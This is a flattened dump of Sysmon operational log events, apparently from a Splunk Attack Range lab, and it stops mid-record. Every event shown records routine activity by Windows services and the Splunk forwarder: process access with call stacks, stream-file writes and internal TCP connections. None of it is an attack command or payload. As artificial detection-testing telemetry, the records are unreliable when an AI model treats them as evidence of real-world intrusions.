07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082127Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082126Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082125Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082124Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B33C-615A-6301-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082123Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B33C-615A-6301-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082122Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.498{2FDD8D40-B33C-615A-6301-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082121Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.435{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4827C9D52A2A5DE46E5B64C38598302F,SHA256=917C4B6306F117D9E2957CEA5E7325B9679F5451948FB1C2BE38D92EEEC0E947,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104238Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:36.424{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49584-false10.0.1.12-8000- 23542300x8000000000000000104237Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:37.434{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2866C384C16051E7DAF10F72426FDCD2,SHA256=DB7BE8B917DD151F3276E6BB5265947459FA0BAA0BAB50B1D0134E70368AB616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082137Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:37.497{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E6D2A18C7894F03955309659EA2B36A,SHA256=129B19515712427839877BE91F04FBCBFEDF561283D62732BE5E40D36A2EA072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082136Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:37.466{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10E4738050E915C7A237A76ED07517D2,SHA256=6F43F9CAC0B42387CE4DC0C2772C53B5E9860C828B21661EA2B2C7C3DDFE0453,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082138Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:38.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E973CF02094049007287A1ABA63AD62,SHA256=A1D1DF44E82818BF3748D0712C53F62ED3D2B87B76B3CC51902C7DA2F64999E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104239Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:38.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2791C6FFEA8539B2C9516BF4CD2DEE65,SHA256=3BB4DF7B67FD2CC4EE059C95BBC466ED465BA27E9BF3F7FAD0472AC45A99120F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082140Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:37.582{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50075-false10.0.1.12-8000- 23542300x800000000000000082139Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:39.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0625DFA8B87D88CFAF3A2A25AE281925,SHA256=3997F50B2F10CAED5968DCB6465374418D143D1D48A3FEE4CDEFF0A5251013CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104241Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:39.653{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=01A9173299D9F3265E2B8FBA3D52FFE2,SHA256=521525921F10586F4CF800186ACBC138A64E0C792CD466BA42BFA31139D2EEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104240Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:39.449{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45A954076F1E841B94593D6FC5D50DE2,SHA256=AA0A79DD7C11B4665A3E7C8F5E93367A202C6A478ACF0A0C855A78920E7C71D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104242Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:40.449{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF145D68A0559CE36F368D66106489E9,SHA256=FCC2932F1FF3E44536A8644154289C5EDE5942D11E7A10DB4FC70781C470298A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082141Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:40.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16411E7082BCE35369F5E488E25215B,SHA256=9F2230B406C9AD205BEB5315EB0F694F5B199B0FF3C379FFF9531323DB22D9D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104243Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:41.465{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAE87A3E413D9D949F0F8F1E2F783124,SHA256=5DBB3036675BE4141438392C22B98936B2FEE4506E994BF61FBB707F8B042344,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082142Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:41.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D2B63F2FC4E4C81EBF66F5D6602B2F4,SHA256=D9EC8D6F0C4D9393DD98729400B2B228D07EF3677314929D62D3E91EBC1DAD7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082143Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:42.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CEF17061F363142928E0575E58285FC,SHA256=9CC2DE7CD36940689C31991D4B713F1552707B6859D59AF50F45A39D9E43819D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104244Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:42.465{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769DCD005BD0C2ECFBEC2139D5AE81DC,SHA256=FA3B24A41BC1331F18EB16018228F6F133AC3B266F79A5D8E11694C0E19AC288,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104246Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:42.439{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49585-false10.0.1.12-8000- 23542300x8000000000000000104245Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:43.465{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF127100C682BED3799680AB092361AC,SHA256=BEE830324B09476D611008F837C4FDC74C4EDC9AC4EF4756588FCBA4088E7E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082144Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:43.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D82EC6213355269AB5B9FE2C18AB156,SHA256=DC095B48F9DCB82A56EA22743A44BC2AF338444F44467B9B91B0B8A541133338,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104247Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:44.465{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8B95ADA5F49CFD61A121D5C18EDA57B,SHA256=AAC48C23BDCFA8826020EF8D4A05FFB568B28CECECD27CFE69D49475C331AA3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082145Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:44.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=949F6073DBE3E6EC111185D4C129D360,SHA256=862C16B8D1ED92D84E6634E52A5B9F1B0433B96A4C040BA1E77254AD39DE04DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104248Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:45.465{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E20DB1FC817188D84AF7C5EB22BD82F4,SHA256=CB8EF15271F67EF10639BF96A5C5D3FD58AD1D7A4C7A2B0195D9844238A27EB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082146Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:45.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BED39394A7B491B4534F1502284F7C30,SHA256=A808C207BDDB267E079CFCD0287E3244BD126E42B8EF4F59EE41324CD6013019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082148Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:46.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D694D8AFCA081AB2DF1209F160456E,SHA256=168DB5FFCD991DB9EAAD7A98F477E6D5DBB1A3E040C88CCFEAF0B51F43C97459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104249Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:46.465{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49F8C8935230F8D9E6F72C8C607B139,SHA256=4C7DBBA8090F82FD6F3544FF199CD490FB43BC4550E2C7BFEFBFC81C2929716E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082147Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:43.597{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50076-false10.0.1.12-8000- 23542300x8000000000000000104250Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:47.481{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B85F6628D3BCD79E5364545F403EAE7,SHA256=E86FA0F18E11CB5E9E842AFBB010854BE2EBB46DBF5A1BDA987527E725395CAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082149Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:47.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E253637B57111AFE7F7517C5443BB3A3,SHA256=161605489C9A08219CEB02E285C25360827FF351D59FB8B468D3D053586DBCE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104251Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:48.481{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21B7E831202C8BAD6BF64005E3078A19,SHA256=F3917A05C2C1100309ED8B9C1BAC2AD1959FA6D41F1E48C4B9F11CAB2548EB06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082150Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:48.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99F5E458785530351AE71EA0736A6D57,SHA256=E00326D45996D0022562925DD19AF489E46A8F552B8EA080E328BEEE60E9C2A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104253Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:48.470{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49586-false10.0.1.12-8000- 23542300x8000000000000000104252Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:49.481{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D9881795BD632287FC4B7D1DD034C20,SHA256=6DD9199F0AF0519D808DD5780121DF47A610D23318728D6B64964E8A0200DBEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082151Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:49.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D74D630619F712A5EC517193856B6E,SHA256=80203DAB0B1E3C406CE504849ACAC7CFCA1AFB4074ABEE948BA55FB3E7BB4CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082153Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:50.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0056CB26F7D4CF3AD8FFF1B39031C3D0,SHA256=F75437F0CDE488AF5A135D71DCE6AE176D6F532AA2529FBD0978EB41D708BE1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104254Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:50.481{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=597D2B61CFA0432EB953E07516345C4C,SHA256=0B472E39D0AA0D233EDBF042BF5990E78BD44FBA5470490051ABBB0C9393C95C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082152Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:48.629{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50077-false10.0.1.12-8000- 23542300x8000000000000000104255Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:51.481{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB39CE559B80078E8FA33760D2D47C19,SHA256=C66752680E488E063D01E99E045FADA5C69CE0D2473C59386958B84FB4D43461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082154Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:51.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 